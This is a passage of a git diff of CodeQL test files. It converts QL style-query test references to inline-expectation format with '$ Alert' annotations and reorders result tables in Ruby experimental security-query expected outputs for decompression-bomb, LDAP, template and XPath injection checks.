-1 +1,2 @@ -queries/style/RedundantImport.ql \ No newline at end of file +query: queries/style/RedundantImport.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/ql/ql/test/queries/style/RedundantOverride/RedundantOverride.qll b/ql/ql/test/queries/style/RedundantOverride/RedundantOverride.qll index 35df3b3194c5..01d4e128615b 100644 --- a/ql/ql/test/queries/style/RedundantOverride/RedundantOverride.qll +++ b/ql/ql/test/queries/style/RedundantOverride/RedundantOverride.qll @@ -6,7 +6,7 @@ module Test1 { } class Bar extends Foo { - override Foo pred() { result = Foo.super.pred() } // BAD + override Foo pred() { result = Foo.super.pred() } // $ Alert // BAD } } @@ -18,7 +18,7 @@ module Test2 { } class Bar extends Foo { - override Foo pred() { result = super.pred() } // BAD + override Foo pred() { result = super.pred() } // $ Alert // BAD } } @@ -107,7 +107,7 @@ module Test8 { } class Bar extends Foo { - override predicate pred(Foo f) { super.pred(f) } // BAD + override predicate pred(Foo f) { super.pred(f) } // $ Alert // BAD } } @@ -121,15 +121,15 @@ module Test9 { class Bar extends Foo { Bar() { this = 1 } - override Foo pred() { Foo.super.pred() = result } // BAD + override Foo pred() { Foo.super.pred() = result } // $ Alert // BAD } class Baz1 extends Foo, Bar { - override Foo pred() { Foo.super.pred() = result } // BAD + override Foo pred() { Foo.super.pred() = result } // $ Alert // BAD } class Baz2 extends Foo, Baz1 { - override Foo pred() { Baz1.super.pred() = result } // BAD + override Foo pred() { Baz1.super.pred() = result } // $ Alert // BAD } } @@ -147,7 +147,7 @@ module Test10 { } class Baz1 extends Foo, Bar { - override Foo pred() { result = Foo.super.pred() } // BAD + override Foo pred() { result = Foo.super.pred() } // $ Alert // BAD } } @@ -161,19 +161,19 @@ module Test11 { class Bar1 extends Foo { Bar1() { this = [1 .. 3] } - override Foo pred() { Foo.super.pred() = result } // BAD + override Foo pred() { Foo.super.pred() = result } // $ Alert // BAD } class Bar2 extends Foo, Bar1 { - override Foo pred() { Foo.super.pred() = result } // BAD + override Foo pred() { Foo.super.pred() = result } // $ Alert // BAD } class Bar3 extends Foo, Bar2 { - override Foo pred() { Bar2.super.pred() = result } // BAD + override Foo pred() { Bar2.super.pred() = result } // $ Alert // BAD } class Bar4 extends Bar2, Bar3 { - override Foo pred() { result = Bar2.super.pred() } // BAD + override Foo pred() { result = Bar2.super.pred() } // $ Alert // BAD } class Bar5 extends Foo { diff --git a/ql/ql/test/queries/style/RedundantOverride/RedundantOverride.qlref b/ql/ql/test/queries/style/RedundantOverride/RedundantOverride.qlref index aca59af1cceb..ac16aebc2e78 100644 --- a/ql/ql/test/queries/style/RedundantOverride/RedundantOverride.qlref +++ b/ql/ql/test/queries/style/RedundantOverride/RedundantOverride.qlref @@ -1 +1,2 @@ -queries/style/RedundantOverride.ql +query: queries/style/RedundantOverride.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/ql/ql/test/queries/style/SwappedParameterNames/SwappedParameterNames.qlref b/ql/ql/test/queries/style/SwappedParameterNames/SwappedParameterNames.qlref index cab8c347410b..78ad77024ca5 100644 --- a/ql/ql/test/queries/style/SwappedParameterNames/SwappedParameterNames.qlref +++ b/ql/ql/test/queries/style/SwappedParameterNames/SwappedParameterNames.qlref @@ -1 +1,2 @@ -queries/style/SwappedParameterNames.ql \ No newline at end of file +query: queries/style/SwappedParameterNames.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/ql/ql/test/queries/style/SwappedParameterNames/Test.qll b/ql/ql/test/queries/style/SwappedParameterNames/Test.qll index 5c8083d3098f..0ee3760c7cb9 100644 --- a/ql/ql/test/queries/style/SwappedParameterNames/Test.qll +++ b/ql/ql/test/queries/style/SwappedParameterNames/Test.qll @@ -9,5 +9,5 @@ class Correct extends Sup { } class Wrong extends Sup { - override predicate step(Expr succ, Expr pred) { none() } // <- swapped parameter names + override predicate step(Expr succ, Expr pred) { none() } // $ Alert // <- swapped parameter names } diff --git a/ql/ql/test/queries/style/UseInstanceofExtension/Foo.qll b/ql/ql/test/queries/style/UseInstanceofExtension/Foo.qll index b58cb3f93e37..b6479e6fc3ad 100644 --- a/ql/ql/test/queries/style/UseInstanceofExtension/Foo.qll +++ b/ql/ql/test/queries/style/UseInstanceofExtension/Foo.qll @@ -4,7 +4,7 @@ class Range extends string { string getAChild() { result = "test" } } -class Inst extends string { +class Inst extends string { // $ Alert Range range; Inst() { this = range } @@ -12,13 +12,13 @@ class Inst extends string { string getAChild() { result = range.getAChild() } } -class Inst2 extends string { +class Inst2 extends string { // $ Alert Inst2() { this instanceof Range } string getAChild() { result = this.(Range).getAChild() } } -class Inst3 extends string { +class Inst3 extends string { // $ Alert Range range; Inst3() { this = range } @@ -26,6 +26,6 @@ class Inst3 extends string { Range getRange() { result = range } } -class Inst4 extends string { +class Inst4 extends string { // $ Alert Inst4() { this instanceof Range } } diff --git a/ql/ql/test/queries/style/UseInstanceofExtension/UseInstanceofExtension.qlref b/ql/ql/test/queries/style/UseInstanceofExtension/UseInstanceofExtension.qlref index 4b8a65157870..d895947b87b7 100644 --- a/ql/ql/test/queries/style/UseInstanceofExtension/UseInstanceofExtension.qlref +++ b/ql/ql/test/queries/style/UseInstanceofExtension/UseInstanceofExtension.qlref @@ -1 +1,2 @@ -queries/style/UseInstanceofExtension.ql \ No newline at end of file +query: queries/style/UseInstanceofExtension.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/ql/ql/test/queries/style/UseSetLiteral/UseSetLiteral.qlref b/ql/ql/test/queries/style/UseSetLiteral/UseSetLiteral.qlref index d4047ebc29fd..545dc8d48424 100644 --- a/ql/ql/test/queries/style/UseSetLiteral/UseSetLiteral.qlref +++ b/ql/ql/test/queries/style/UseSetLiteral/UseSetLiteral.qlref @@ -1 +1,2 @@ -queries/style/UseSetLiteral.ql \ No newline at end of file +query: queries/style/UseSetLiteral.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/ql/ql/test/queries/style/UseSetLiteral/test.qll b/ql/ql/test/queries/style/UseSetLiteral/test.qll index fcc581c3e8cd..0fd1dab6ddde 100644 --- a/ql/ql/test/queries/style/UseSetLiteral/test.qll +++ b/ql/ql/test/queries/style/UseSetLiteral/test.qll @@ -4,7 +4,7 @@ predicate test1(int a) { a = 1 or // BAD a = 2 or a = 3 or - a = 4 + a = 4 // $ Alert } predicate test2(int a) { @@ -30,7 +30,7 @@ predicate test5() { test1(1) or // BAD test1(2) or test1(3) or - test1(4) + test1(4) // $ Alert } predicate test6() { @@ -44,7 +44,7 @@ int test7() { 1 = result or // BAD 2 = result or 3 = result or - 4 = result + 4 = result // $ Alert } predicate test8() { @@ -62,19 +62,19 @@ class MyTest8Class extends int { this = 1 or // BAD this = 2 or this = 3 or - this = 4 + this = 4 // $ Alert ) and ( s = "1" or // BAD s = "2" or s = "3" or - s = "4" + s = "4" // $ Alert ) and exists(float f | f = 1.0 or // BAD f = 1.5 or f = 2.0 or - f = 2.5 + f = 2.5 // $ Alert ) } @@ -89,7 +89,7 @@ predicate test9(MyTest8Class c) { c.is(1) or // BAD c.is(2) or c.is(3) or - c.is(4) + c.is(4) // $ Alert } predicate test10(MyTest8Class c) { @@ -133,5 +133,5 @@ predicate test14(int a) { (a = 2 or a = 3) or a = 4 - ) + ) // $ Alert } diff --git a/ql/ql/test/queries/style/ValidatePredicateGetReturns/ValidatePredicateGetReturns.qlref b/ql/ql/test/queries/style/ValidatePredicateGetReturns/ValidatePredicateGetReturns.qlref index e116f69d6b22..7a89245d787e 100644 --- a/ql/ql/test/queries/style/ValidatePredicateGetReturns/ValidatePredicateGetReturns.qlref +++ b/ql/ql/test/queries/style/ValidatePredicateGetReturns/ValidatePredicateGetReturns.qlref @@ -1 +1,2 @@ -queries/style/ValidatePredicateGetReturns.ql +query: queries/style/ValidatePredicateGetReturns.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/ql/ql/test/queries/style/ValidatePredicateGetReturns/test.qll b/ql/ql/test/queries/style/ValidatePredicateGetReturns/test.qll index 2cc4dec64d20..e9c34eb94a65 100644 --- a/ql/ql/test/queries/style/ValidatePredicateGetReturns/test.qll +++ b/ql/ql/test/queries/style/ValidatePredicateGetReturns/test.qll @@ -1,7 +1,7 @@ import ql // NOT OK -- Predicate starts with "get" but does not return a value -predicate getValue() { none() } +predicate getValue() { none() } // $ Alert // OK -- starts with get and returns a value string getData() { result = "data" } @@ -22,13 +22,13 @@ predicate getvalue() { none() } predicate retrieveValue() { none() } // NOT OK -- starts with get and does not return value -predicate getImplementation2() { none() } +predicate getImplementation2() { none() } // $ Alert // NOT OK -- is an alias for a predicate which does not have a return value -predicate getAlias2 = getImplementation2/0; +predicate getAlias2 = getImplementation2/0; // $ Alert // NOT OK -- starts with as and does not return value -predicate asValue() { none() } +predicate asValue() { none() } // $ Alert // OK -- starts with as but followed by a lowercase letter, probably should be ignored predicate assessment() { none() } @@ -45,7 +45,7 @@ HiddenType getInjectableCompositeActionNode() { predicate implementation4() { none() } // NOT OK -- is an alias -predicate getAlias4 = implementation4/0; +predicate getAlias4 = implementation4/0; // $ Alert // OK -- is an alias predicate alias5 = implementation4/0; @@ -58,7 +58,7 @@ predicate edge(int x, int y) { none() } int getDistance(int x) = shortestDistances(root/0, edge/2)(_, x, result) // NOT OK -- Higher-order predicate that does not return a value even though has 'get' in the name -predicate getDistance2(int x, int y) = shortestDistances(root/0, edge/2)(_, x, y) +predicate getDistance2(int x, int y) = shortestDistances(root/0, edge/2)(_, x, y) // $ Alert // OK predicate unresolvedAlias = unresolved/0; diff --git a/ruby/ql/test/query-tests/experimental/CWE-522-DecompressionBombs/DecompressionBombs.expected b/ruby/ql/test/query-tests/experimental/CWE-522-DecompressionBombs/DecompressionBombs.expected index 2631d47b89f4..e2f8d0cb2304 100644 --- a/ruby/ql/test/query-tests/experimental/CWE-522-DecompressionBombs/DecompressionBombs.expected +++ b/ruby/ql/test/query-tests/experimental/CWE-522-DecompressionBombs/DecompressionBombs.expected @@ -1,24 +1,3 @@ -#select -| gzipBombs.rb:6:3:6:34 | call to open | gzipBombs.rb:4:15:4:20 | call to params | gzipBombs.rb:6:3:6:34 | call to open | This file Decompression depends on a $@. | gzipBombs.rb:4:15:4:20 | call to params | potentially untrusted source | -| gzipBombs.rb:7:3:9:5 | call to open | gzipBombs.rb:4:15:4:20 | call to params | gzipBombs.rb:7:3:9:5 | call to open | This file Decompression depends on a $@. | gzipBombs.rb:4:15:4:20 | call to params | potentially untrusted source | -| gzipBombs.rb:10:3:14:5 | call to open | gzipBombs.rb:4:15:4:20 | call to params | gzipBombs.rb:10:3:14:5 | call to open | This file Decompression depends on a $@. | gzipBombs.rb:4:15:4:20 | call to params | potentially untrusted source | -| gzipBombs.rb:15:22:15:53 | call to open | gzipBombs.rb:4:15:4:20 | call to params | gzipBombs.rb:15:22:15:53 | call to open | This file Decompression depends on a $@. | gzipBombs.rb:4:15:4:20 | call to params | potentially untrusted source | -| gzipBombs.rb:20:3:20:50 | call to new | gzipBombs.rb:4:15:4:20 | call to params | gzipBombs.rb:20:3:20:50 | call to new | This file Decompression depends on a $@. | gzipBombs.rb:4:15:4:20 | call to params | potentially untrusted source | -| gzipBombs.rb:21:3:21:50 | call to new | gzipBombs.rb:4:15:4:20 | call to params | gzipBombs.rb:21:3:21:50 | call to new | This file Decompression depends on a $@. | gzipBombs.rb:4:15:4:20 | call to params | potentially untrusted source | -| gzipBombs.rb:25:3:25:40 | call to zcat | gzipBombs.rb:4:15:4:20 | call to params | gzipBombs.rb:25:3:25:40 | call to zcat | This file Decompression depends on a $@. | gzipBombs.rb:4:15:4:20 | call to params | potentially untrusted source | -| zipBombs.rb:6:3:11:5 | call to open | zipBombs.rb:4:18:4:23 | call to params | zipBombs.rb:6:3:11:5 | call to open | This file Decompression depends on a $@. | zipBombs.rb:4:18:4:23 | call to params | potentially untrusted source | -| zipBombs.rb:12:3:14:5 | call to open | zipBombs.rb:4:18:4:23 | call to params | zipBombs.rb:12:3:14:5 | call to open | This file Decompression depends on a $@. | zipBombs.rb:4:18:4:23 | call to params | potentially untrusted source | -| zipBombs.rb:15:11:15:45 | call to open | zipBombs.rb:4:18:4:23 | call to params | zipBombs.rb:15:11:15:45 | call to open | This file Decompression depends on a $@. | zipBombs.rb:4:18:4:23 | call to params | potentially untrusted source | -| zipBombs.rb:17:3:17:42 | call to read | zipBombs.rb:4:18:4:23 | call to params | zipBombs.rb:17:3:17:42 | call to read | This file Decompression depends on a $@. | zipBombs.rb:4:18:4:23 | call to params | potentially untrusted source | -| zipBombs.rb:18:3:18:51 | call to extract | zipBombs.rb:4:18:4:23 | call to params | zipBombs.rb:18:3:18:51 | call to extract | This file Decompression depends on a $@. | zipBombs.rb:4:18:4:23 | call to params | potentially untrusted source | -| zipBombs.rb:28:7:28:33 | call to read | zipBombs.rb:4:18:4:23 | call to params | zipBombs.rb:28:7:28:33 | call to read | This file Decompression depends on a $@. | zipBombs.rb:4:18:4:23 | call to params | potentially untrusted source | -| zipBombs.rb:34:5:34:17 | call to extract | zipBombs.rb:4:18:4:23 | call to params | zipBombs.rb:34:5:34:17 | call to extract | This file Decompression depends on a $@. | zipBombs.rb:4:18:4:23 | call to params | potentially untrusted source | -| zipBombs.rb:35:5:35:31 | call to read | zipBombs.rb:4:18:4:23 | call to params | zipBombs.rb:35:5:35:31 | call to read | This file Decompression depends on a $@. | zipBombs.rb:4:18:4:23 | call to params | potentially untrusted source | -| zipBombs.rb:41:7:41:31 | call to read | zipBombs.rb:4:18:4:23 | call to params | zipBombs.rb:41:7:41:31 | call to read | This file Decompression depends on a $@. | zipBombs.rb:4:18:4:23 | call to params | potentially untrusted source | -| zipBombs.rb:42:7:42:19 | call to extract | zipBombs.rb:4:18:4:23 | call to params | zipBombs.rb:42:7:42:19 | call to extract | This file Decompression depends on a $@. | zipBombs.rb:4:18:4:23 | call to params | potentially untrusted source | -| zipBombs.rb:46:10:46:36 | call to read | zipBombs.rb:4:18:4:23 | call to params | zipBombs.rb:46:10:46:36 | call to read | This file Decompression depends on a $@. | zipBombs.rb:4:18:4:23 | call to params | potentially untrusted source | -| zipBombs.rb:51:8:51:34 | call to read | zipBombs.rb:4:18:4:23 | call to params | zipBombs.rb:51:8:51:34 | call to read | This file Decompression depends on a $@. | zipBombs.rb:4:18:4:23 | call to params | potentially untrusted source | -| zipBombs.rb:55:5:55:31 | call to read | zipBombs.rb:4:18:4:23 | call to params | zipBombs.rb:55:5:55:31 | call to read | This file Decompression depends on a $@. | zipBombs.rb:4:18:4:23 | call to params | potentially untrusted source | edges | gzipBombs.rb:4:3:4:11 | gzip_path | gzipBombs.rb:6:25:6:33 | gzip_path | provenance | | | gzipBombs.rb:4:15:4:20 | call to params | gzipBombs.rb:4:15:4:27 | ...[...] | provenance | | @@ -112,3 +91,24 @@ nodes | zipBombs.rb:53:29:53:40 | zipfile_path | semmle.label | zipfile_path | | zipBombs.rb:55:5:55:31 | call to read | semmle.label | call to read | subpaths +#select +| gzipBombs.rb:6:3:6:34 | call to open | gzipBombs.rb:4:15:4:20 | call to params | gzipBombs.rb:6:3:6:34 | call to open | This file Decompression depends on a $@. | gzipBombs.rb:4:15:4:20 | call to params | potentially untrusted source | +| gzipBombs.rb:7:3:9:5 | call to open | gzipBombs.rb:4:15:4:20 | call to params | gzipBombs.rb:7:3:9:5 | call to open | This file Decompression depends on a $@. | gzipBombs.rb:4:15:4:20 | call to params | potentially untrusted source | +| gzipBombs.rb:10:3:14:5 | call to open | gzipBombs.rb:4:15:4:20 | call to params | gzipBombs.rb:10:3:14:5 | call to open | This file Decompression depends on a $@. | gzipBombs.rb:4:15:4:20 | call to params | potentially untrusted source | +| gzipBombs.rb:15:22:15:53 | call to open | gzipBombs.rb:4:15:4:20 | call to params | gzipBombs.rb:15:22:15:53 | call to open | This file Decompression depends on a $@. | gzipBombs.rb:4:15:4:20 | call to params | potentially untrusted source | +| gzipBombs.rb:20:3:20:50 | call to new | gzipBombs.rb:4:15:4:20 | call to params | gzipBombs.rb:20:3:20:50 | call to new | This file Decompression depends on a $@. | gzipBombs.rb:4:15:4:20 | call to params | potentially untrusted source | +| gzipBombs.rb:21:3:21:50 | call to new | gzipBombs.rb:4:15:4:20 | call to params | gzipBombs.rb:21:3:21:50 | call to new | This file Decompression depends on a $@. | gzipBombs.rb:4:15:4:20 | call to params | potentially untrusted source | +| gzipBombs.rb:25:3:25:40 | call to zcat | gzipBombs.rb:4:15:4:20 | call to params | gzipBombs.rb:25:3:25:40 | call to zcat | This file Decompression depends on a $@. | gzipBombs.rb:4:15:4:20 | call to params | potentially untrusted source | +| zipBombs.rb:6:3:11:5 | call to open | zipBombs.rb:4:18:4:23 | call to params | zipBombs.rb:6:3:11:5 | call to open | This file Decompression depends on a $@. | zipBombs.rb:4:18:4:23 | call to params | potentially untrusted source | +| zipBombs.rb:12:3:14:5 | call to open | zipBombs.rb:4:18:4:23 | call to params | zipBombs.rb:12:3:14:5 | call to open | This file Decompression depends on a $@. | zipBombs.rb:4:18:4:23 | call to params | potentially untrusted source | +| zipBombs.rb:15:11:15:45 | call to open | zipBombs.rb:4:18:4:23 | call to params | zipBombs.rb:15:11:15:45 | call to open | This file Decompression depends on a $@. | zipBombs.rb:4:18:4:23 | call to params | potentially untrusted source | +| zipBombs.rb:17:3:17:42 | call to read | zipBombs.rb:4:18:4:23 | call to params | zipBombs.rb:17:3:17:42 | call to read | This file Decompression depends on a $@. | zipBombs.rb:4:18:4:23 | call to params | potentially untrusted source | +| zipBombs.rb:18:3:18:51 | call to extract | zipBombs.rb:4:18:4:23 | call to params | zipBombs.rb:18:3:18:51 | call to extract | This file Decompression depends on a $@. | zipBombs.rb:4:18:4:23 | call to params | potentially untrusted source | +| zipBombs.rb:28:7:28:33 | call to read | zipBombs.rb:4:18:4:23 | call to params | zipBombs.rb:28:7:28:33 | call to read | This file Decompression depends on a $@. | zipBombs.rb:4:18:4:23 | call to params | potentially untrusted source | +| zipBombs.rb:34:5:34:17 | call to extract | zipBombs.rb:4:18:4:23 | call to params | zipBombs.rb:34:5:34:17 | call to extract | This file Decompression depends on a $@. | zipBombs.rb:4:18:4:23 | call to params | potentially untrusted source | +| zipBombs.rb:35:5:35:31 | call to read | zipBombs.rb:4:18:4:23 | call to params | zipBombs.rb:35:5:35:31 | call to read | This file Decompression depends on a $@. | zipBombs.rb:4:18:4:23 | call to params | potentially untrusted source | +| zipBombs.rb:41:7:41:31 | call to read | zipBombs.rb:4:18:4:23 | call to params | zipBombs.rb:41:7:41:31 | call to read | This file Decompression depends on a $@. | zipBombs.rb:4:18:4:23 | call to params | potentially untrusted source | +| zipBombs.rb:42:7:42:19 | call to extract | zipBombs.rb:4:18:4:23 | call to params | zipBombs.rb:42:7:42:19 | call to extract | This file Decompression depends on a $@. | zipBombs.rb:4:18:4:23 | call to params | potentially untrusted source | +| zipBombs.rb:46:10:46:36 | call to read | zipBombs.rb:4:18:4:23 | call to params | zipBombs.rb:46:10:46:36 | call to read | This file Decompression depends on a $@. | zipBombs.rb:4:18:4:23 | call to params | potentially untrusted source | +| zipBombs.rb:51:8:51:34 | call to read | zipBombs.rb:4:18:4:23 | call to params | zipBombs.rb:51:8:51:34 | call to read | This file Decompression depends on a $@. | zipBombs.rb:4:18:4:23 | call to params | potentially untrusted source | +| zipBombs.rb:55:5:55:31 | call to read | zipBombs.rb:4:18:4:23 | call to params | zipBombs.rb:55:5:55:31 | call to read | This file Decompression depends on a $@. | zipBombs.rb:4:18:4:23 | call to params | potentially untrusted source | diff --git a/ruby/ql/test/query-tests/experimental/ImproperLdapAuth/ImproperLdapAuth.expected b/ruby/ql/test/query-tests/experimental/ImproperLdapAuth/ImproperLdapAuth.expected index da8f84eabfba..635cfcd4b3e7 100644 --- a/ruby/ql/test/query-tests/experimental/ImproperLdapAuth/ImproperLdapAuth.expected +++ b/ruby/ql/test/query-tests/experimental/ImproperLdapAuth/ImproperLdapAuth.expected @@ -1,6 +1,3 @@ -#select -| ImproperLdapAuth.rb:15:23:15:26 | pass | ImproperLdapAuth.rb:5:12:5:17 | call to params | ImproperLdapAuth.rb:15:23:15:26 | pass | This LDAP authentication depends on a $@. | ImproperLdapAuth.rb:5:12:5:17 | call to params | user-provided value | -| ImproperLdapAuth.rb:31:24:31:27 | pass | ImproperLdapAuth.rb:24:12:24:17 | call to params | ImproperLdapAuth.rb:31:24:31:27 | pass | This LDAP authentication depends on a $@. | ImproperLdapAuth.rb:24:12:24:17 | call to params | user-provided value | edges | ImproperLdapAuth.rb:5:5:5:8 | pass | ImproperLdapAuth.rb:15:23:15:26 | pass | provenance | | | ImproperLdapAuth.rb:5:12:5:17 | call to params | ImproperLdapAuth.rb:5:12:5:24 | ...[...] | provenance | | @@ -18,3 +15,6 @@ nodes | ImproperLdapAuth.rb:24:12:24:24 | ...[...] | semmle.label | ...[...] | | ImproperLdapAuth.rb:31:24:31:27 | pass | semmle.label | pass | subpaths +#select +| ImproperLdapAuth.rb:15:23:15:26 | pass | ImproperLdapAuth.rb:5:12:5:17 | call to params | ImproperLdapAuth.rb:15:23:15:26 | pass | This LDAP authentication depends on a $@. | ImproperLdapAuth.rb:5:12:5:17 | call to params | user-provided value | +| ImproperLdapAuth.rb:31:24:31:27 | pass | ImproperLdapAuth.rb:24:12:24:17 | call to params | ImproperLdapAuth.rb:31:24:31:27 | pass | This LDAP authentication depends on a $@. | ImproperLdapAuth.rb:24:12:24:17 | call to params | user-provided value | diff --git a/ruby/ql/test/query-tests/experimental/InsecureRandomness/InsecureRandomness.expected b/ruby/ql/test/query-tests/experimental/InsecureRandomness/InsecureRandomness.expected index 36cb35dfaffb..581157b61235 100644 --- a/ruby/ql/test/query-tests/experimental/InsecureRandomness/InsecureRandomness.expected +++ b/ruby/ql/test/query-tests/experimental/InsecureRandomness/InsecureRandomness.expected @@ -1,6 +1,6 @@ -#select -| InsecureRandomness.rb:6:42:6:57 | call to rand | InsecureRandomness.rb:6:42:6:57 | call to rand | InsecureRandomness.rb:6:42:6:57 | call to rand | This uses a cryptographically insecure random number generated at $@ in a security context. | InsecureRandomness.rb:6:42:6:57 | call to rand | call to rand | edges nodes | InsecureRandomness.rb:6:42:6:57 | call to rand | semmle.label | call to rand | subpaths +#select +| InsecureRandomness.rb:6:42:6:57 | call to rand | InsecureRandomness.rb:6:42:6:57 | call to rand | InsecureRandomness.rb:6:42:6:57 | call to rand | This uses a cryptographically insecure random number generated at $@ in a security context. | InsecureRandomness.rb:6:42:6:57 | call to rand | call to rand | diff --git a/ruby/ql/test/query-tests/experimental/LdapInjection/Ldapinjection.expected b/ruby/ql/test/query-tests/experimental/LdapInjection/Ldapinjection.expected index 1e6ebba4f852..1eec0daa4c4c 100644 --- a/ruby/ql/test/query-tests/experimental/LdapInjection/Ldapinjection.expected +++ b/ruby/ql/test/query-tests/experimental/LdapInjection/Ldapinjection.expected @@ -1,8 +1,3 @@ -#select -| LdapInjection.rb:25:23:25:49 | "ou=people,dc=#{...},dc=com" | LdapInjection.rb:5:10:5:15 | call to params | LdapInjection.rb:25:23:25:49 | "ou=people,dc=#{...},dc=com" | This LDAP query depends on a $@. | LdapInjection.rb:5:10:5:15 | call to params | user-provided value | -| LdapInjection.rb:29:62:29:73 | "cn=#{...}" | LdapInjection.rb:9:12:9:17 | call to params | LdapInjection.rb:29:62:29:73 | "cn=#{...}" | This LDAP query depends on a $@. | LdapInjection.rb:9:12:9:17 | call to params | user-provided value | -| LdapInjection.rb:33:87:33:92 | call to [] | LdapInjection.rb:9:12:9:17 | call to params | LdapInjection.rb:33:87:33:92 | call to [] | This LDAP query depends on a $@. | LdapInjection.rb:9:12:9:17 | call to params | user-provided value | -| LdapInjection.rb:38:62:38:67 | filter | LdapInjection.rb:9:12:9:17 | call to params | LdapInjection.rb:38:62:38:67 | filter | This LDAP query depends on a $@. | LdapInjection.rb:9:12:9:17 | call to params | user-provided value | edges | LdapInjection.rb:5:5:5:6 | dc | LdapInjection.rb:25:23:25:49 | "ou=people,dc=#{...},dc=com" | provenance | AdditionalTaintStep | | LdapInjection.rb:5:10:5:15 | call to params | LdapInjection.rb:5:10:5:20 | ...[...] | provenance | | @@ -33,3 +28,8 @@ nodes | LdapInjection.rb:37:41:37:44 | name | semmle.label | name | | LdapInjection.rb:38:62:38:67 | filter | semmle.label | filter | subpaths +#select +| LdapInjection.rb:25:23:25:49 | "ou=people,dc=#{...},dc=com" | LdapInjection.rb:5:10:5:15 | call to params | LdapInjection.rb:25:23:25:49 | "ou=people,dc=#{...},dc=com" | This LDAP query depends on a $@. | LdapInjection.rb:5:10:5:15 | call to params | user-provided value | +| LdapInjection.rb:29:62:29:73 | "cn=#{...}" | LdapInjection.rb:9:12:9:17 | call to params | LdapInjection.rb:29:62:29:73 | "cn=#{...}" | This LDAP query depends on a $@. | LdapInjection.rb:9:12:9:17 | call to params | user-provided value | +| LdapInjection.rb:33:87:33:92 | call to [] | LdapInjection.rb:9:12:9:17 | call to params | LdapInjection.rb:33:87:33:92 | call to [] | This LDAP query depends on a $@. | LdapInjection.rb:9:12:9:17 | call to params | user-provided value | +| LdapInjection.rb:38:62:38:67 | filter | LdapInjection.rb:9:12:9:17 | call to params | LdapInjection.rb:38:62:38:67 | filter | This LDAP query depends on a $@. | LdapInjection.rb:9:12:9:17 | call to params | user-provided value | diff --git a/ruby/ql/test/query-tests/experimental/TemplateInjection/TemplateInjection.expected b/ruby/ql/test/query-tests/experimental/TemplateInjection/TemplateInjection.expected index 2355550b9328..cdb6045d4daf 100644 --- a/ruby/ql/test/query-tests/experimental/TemplateInjection/TemplateInjection.expected +++ b/ruby/ql/test/query-tests/experimental/TemplateInjection/TemplateInjection.expected @@ -1,8 +1,3 @@ -#select -| ErbInjection.rb:15:24:15:31 | bad_text | ErbInjection.rb:5:12:5:17 | call to params | ErbInjection.rb:15:24:15:31 | bad_text | This template depends on a $@. | ErbInjection.rb:5:12:5:17 | call to params | user-provided value | -| ErbInjection.rb:19:20:19:27 | bad_text | ErbInjection.rb:5:12:5:17 | call to params | ErbInjection.rb:19:20:19:27 | bad_text | This template depends on a $@. | ErbInjection.rb:5:12:5:17 | call to params | user-provided value | -| SlimInjection.rb:14:25:14:32 | bad_text | SlimInjection.rb:5:12:5:17 | call to params | SlimInjection.rb:14:25:14:32 | bad_text | This template depends on a $@. | SlimInjection.rb:5:12:5:17 | call to params | user-provided value | -| SlimInjection.rb:23:25:23:33 | bad2_text | SlimInjection.rb:5:12:5:17 | call to params | SlimInjection.rb:23:25:23:33 | bad2_text | This template depends on a $@. | SlimInjection.rb:5:12:5:17 | call to params | user-provided value | edges | ErbInjection.rb:5:5:5:8 | name | ErbInjection.rb:8:5:8:12 | bad_text | provenance | | | ErbInjection.rb:5:5:5:8 | name | ErbInjection.rb:11:11:11:14 | name | provenance | | @@ -40,3 +35,8 @@ nodes | SlimInjection.rb:23:23:23:35 | { ... } : [lambda] [captured bad2_text] : String | semmle.label | { ... } : [lambda] [captured bad2_text] : String | | SlimInjection.rb:23:25:23:33 | bad2_text | semmle.label | bad2_text | subpaths +#select +| ErbInjection.rb:15:24:15:31 | bad_text | ErbInjection.rb:5:12:5:17 | call to params | ErbInjection.rb:15:24:15:31 | bad_text | This template depends on a $@. | ErbInjection.rb:5:12:5:17 | call to params | user-provided value | +| ErbInjection.rb:19:20:19:27 | bad_text | ErbInjection.rb:5:12:5:17 | call to params | ErbInjection.rb:19:20:19:27 | bad_text | This template depends on a $@. | ErbInjection.rb:5:12:5:17 | call to params | user-provided value | +| SlimInjection.rb:14:25:14:32 | bad_text | SlimInjection.rb:5:12:5:17 | call to params | SlimInjection.rb:14:25:14:32 | bad_text | This template depends on a $@. | SlimInjection.rb:5:12:5:17 | call to params | user-provided value | +| SlimInjection.rb:23:25:23:33 | bad2_text | SlimInjection.rb:5:12:5:17 | call to params | SlimInjection.rb:23:25:23:33 | bad2_text | This template depends on a $@. | SlimInjection.rb:5:12:5:17 | call to params | user-provided value | diff --git a/ruby/ql/test/query-tests/experimental/XPathInjection/XPathInjection.expected b/ruby/ql/test/query-tests/experimental/XPathInjection/XPathInjection.expected index 369a01c72f02..66ef14da3d7f 100644 --- a/ruby/ql/test/query-tests/experimental/XPathInjection/XPathInjection.expected +++ b/ruby/ql/test/query-tests/experimental/XPathInjection/XPathInjection.expected @@ -1,14 +1,3 @@ -#select -| LibxmlInjection.rb:21:31:21:41 | "//#{...}" | LibxmlInjection.rb:5:12:5:17 | call to params | LibxmlInjection.rb:21:31:21:41 | "//#{...}" | XPath expression depends on a $@. | LibxmlInjection.rb:5:12:5:17 | call to params | user-provided value | -| LibxmlInjection.rb:27:25:27:35 | "//#{...}" | LibxmlInjection.rb:5:12:5:17 | call to params | LibxmlInjection.rb:27:25:27:35 | "//#{...}" | XPath expression depends on a $@. | LibxmlInjection.rb:5:12:5:17 | call to params | user-provided value | -| NokogiriInjection.rb:21:23:21:33 | "//#{...}" | NokogiriInjection.rb:5:12:5:17 | call to params | NokogiriInjection.rb:21:23:21:33 | "//#{...}" | XPath expression depends on a $@. | NokogiriInjection.rb:5:12:5:17 | call to params | user-provided value | -| NokogiriInjection.rb:27:26:27:36 | "//#{...}" | NokogiriInjection.rb:5:12:5:17 | call to params | NokogiriInjection.rb:27:26:27:36 | "//#{...}" | XPath expression depends on a $@. | NokogiriInjection.rb:5:12:5:17 | call to params | user-provided value | -| NokogiriInjection.rb:33:29:33:39 | "//#{...}" | NokogiriInjection.rb:5:12:5:17 | call to params | NokogiriInjection.rb:33:29:33:39 | "//#{...}" | XPath expression depends on a $@. | NokogiriInjection.rb:5:12:5:17 | call to params | user-provided value | -| NokogiriInjection.rb:41:15:41:25 | 